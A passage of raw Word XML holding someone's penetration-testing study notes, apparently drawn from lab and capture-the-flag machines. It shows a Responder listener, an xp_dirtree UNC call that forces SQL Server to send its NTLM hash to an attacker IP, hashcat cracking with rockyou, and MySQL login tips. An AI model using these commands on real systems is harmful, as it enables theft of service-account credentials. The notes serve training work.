        </w:rPr>
        <w:t xml:space="preserve">xp_dirtree?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_dirtree is a SQL Server extended stored procedure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It lists subdirectories of a specified path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can pass it UNC (Universal Naming Convention) paths (like \\IP\share) that point to remote SMB shares.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How they work together:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo responder -I tun0 -v </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now their machine (say, 10.10.14.3) is ready to catch NTLM hashes sent over SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC xp_dirtree '\\10.10.10.10\fake\share'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Server tries to reach that UNC path via SMB — and sends an NTLM authentication request from the SQL Server's Windows account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Responder </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">intercepts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">this request and saves the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">net-NTLMv2 hash of the Windows account that the SQL Server service is running as</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker then uses tools like hashcat to crack the hash and get the password of the SQL Server's Windows account (often a domain user or admin!)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the case of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escape HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we got the user account sql_svc, and the NTLMv2 hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1130300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="567" name="image556.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image556.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId519"/>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19E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to copy and paste the ENTIRE NTLM hash, all the way from "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_apache</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" all the way to the end of the hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashcat expects that format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from a different box, so the username doesn't match up with sql_svc, but you get the point. Just make sure to copy the ENTIRE THING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p3csxpe9y46v" w:id="207"/>
      <w:bookmarkEnd w:id="207"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to crack the NTLMv2 hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Taught in-depth in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 15.3.3. Cracking Net-NTLMv2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use hash cat and the rockyou.txt wordlist. It might autodetect the NTLMv2, but if not, you can specify using the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-m 5600</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="503"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019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9EC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jtzzd1oev67s" w:id="208"/>
      <w:bookmarkEnd w:id="208"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId520">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mysql cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to log into MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -h &lt;IP&gt; -u [username] -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The p flag tells them that it's asking for a password. Don't put an argument for it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -h &lt;IP&gt; -u [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to use no passwords, don't include the -p flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secura Challenge Labs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I accidentally used two spaces instead of one between the flags, and it didn't work. So make sure only to use one space!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever get this error: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then just add this flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--skip-ssl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--ssl=off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql -h 192.168.165.88 --skip-ssl -u root -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql -h 127.0.0.1 --ssl=off -u root -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019FF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fvil5nfgi7es" w:id="209"/>
      <w:bookmarkEnd w:id="209"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to tell if you need to pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secura </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge Labs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
